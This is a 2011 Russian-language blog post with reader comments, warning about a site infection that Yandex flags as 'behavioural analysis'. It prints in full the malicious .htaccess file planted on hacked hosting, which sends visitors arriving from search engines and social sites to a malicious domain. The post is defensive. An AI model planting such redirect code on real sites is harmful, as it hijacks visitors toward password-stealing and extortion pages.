14.09.2011 13:20

Новый вирус – «Поведенческий анализ» определяется Яндексом


Новый вирус – «Поведенческий анализ» определяется ЯндексомТехнологии не стоят на месте. Появился новый вирус который открывает нужные сайты в зависимости от сайтов с которых вы заходите.

Определяется вирус в Яндексе как «Поведенческий анализ».

Вирус может направлять пользователей зашедших на ваш сайт на какие угодно сайты, на сайты с вирусами которые будут воровать ваши пароли или блокировать компьютер и вымогать послать СМС на их номер.

Эти вирусы могут использоваться для накручивания посетителей на сайтах. Также и для раскрутки сайтов поведенческим фактором.

Имея полный доступ к вашим сайтам, преступники могут менять адреса и направлять посетителей на новые и новые ресурсы.

Поисковые системы Яндекс и Google опережают на 1 шаг создателей вирусов и постепенно блокируют подобные зараженные сайты (примерно в течение недели), но если сайт популярный и был взломан то многие посетители за эту неделю могут пострадать.

Заражение происходит из-за кражи паролей от хостинга, либо от взлома хостинга. На хостинг размещается файл .htaccess (вредоносный код сдвинут пробелами, что бы вы его не сразу смогли найти) с таким содержанием:

ErrorDocument 400 http://secaviable.ru/about/index.php
ErrorDocument 401 http://secaviable.ru/about/index.php
ErrorDocument 403 http://secaviable.ru/about/index.php
ErrorDocument 404 http://secaviable.ru/about/index.php
ErrorDocument 500 http://secaviable.ru/about/index.php
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteCond %{HTTP_REFERER} .*google.* [OR]
RewriteCond %{HTTP_REFERER} .*ask.* [OR]
RewriteCond %{HTTP_REFERER} .*yahoo.* [OR]
RewriteCond %{HTTP_REFERER} .*baidu.* [OR]
RewriteCond %{HTTP_REFERER} .*youtube.* [OR]
RewriteCond %{HTTP_REFERER} .*wikipedia.* [OR]
RewriteCond %{HTTP_REFERER} .*qq.* [OR]
RewriteCond %{HTTP_REFERER} .*excite.* [OR]
RewriteCond %{HTTP_REFERER} .*altavista.* [OR]
RewriteCond %{HTTP_REFERER} .*msn.* [OR]
RewriteCond %{HTTP_REFERER} .*netscape.* [OR]
RewriteCond %{HTTP_REFERER} .*aol.* [OR]
RewriteCond %{HTTP_REFERER} .*hotbot.* [OR]
RewriteCond %{HTTP_REFERER} .*goto.* [OR]
RewriteCond %{HTTP_REFERER} .*infoseek.* [OR]
RewriteCond %{HTTP_REFERER} .*mamma.* [OR]
RewriteCond %{HTTP_REFERER} .*alltheweb.* [OR]
RewriteCond %{HTTP_REFERER} .*lycos.* [OR]
RewriteCond %{HTTP_REFERER} .*search.* [OR]
RewriteCond %{HTTP_REFERER} .*metacrawler.* [OR]
RewriteCond %{HTTP_REFERER} .*bing.* [OR]
RewriteCond %{HTTP_REFERER} .*dogpile.* [OR]
RewriteCond %{HTTP_REFERER} .*facebook.* [OR]
RewriteCond %{HTTP_REFERER} .*twitter.* [OR]
RewriteCond %{HTTP_REFERER} .*blog.* [OR]
RewriteCond %{HTTP_REFERER} .*live.* [OR]
RewriteCond %{HTTP_REFERER} .*myspace.* [OR]
RewriteCond %{HTTP_REFERER} .*mail.* [OR]
RewriteCond %{HTTP_REFERER} .*yandex.* [OR]
RewriteCond %{HTTP_REFERER} .*rambler.* [OR]
RewriteCond %{HTTP_REFERER} .*ya.* [OR]
RewriteCond %{HTTP_REFERER} .*aport.* [OR]
RewriteCond %{HTTP_REFERER} .*linkedin.* [OR]
RewriteCond %{HTTP_REFERER} .*flickr.*
RewriteRule ^(.*)$ http://secaviable.ru/about/index.php [R=301,L]
</IfModule>





Смотри также:


Комментарии (5):

# 2011-10-26, 10:19 Гость
Яндекс вчера на сайте 3dnews.ru вирус нашёл , сегодня на Гайдпарке вирус http://yandex.ru/yandsearch?text=%D0%93%D0%B0%D0%B9%D0%B4%D0%BF%D0%B0%D1%80%D0%BA&lr=54 первый раз вижу чтобы вирусня на большой соцсети! Не следят вообще админы?
# 2012-02-10, 02:41 Татьяна
Но вы и не сказали как эту фигню точно найти,у меня яндекс периодически про него пишет,а что делать не знаю?
# 2012-02-28, 21:23 Гость
Открыть файл .htaccess в корне хостинга и почистить
# 2012-04-09, 22:25 Ирина
А как быть, если реклама от Яндекса определяется Яндексом как вредоносный код? Это не прикол, а грустная реальность....
# 2013-01-28, 22:22 van4a
На одном моем сайте каждую неделю в яндексмастере появляется надпись, что сайт заражен а потом исчезает! Сайт абсолютно чистый

Добавить комментарий: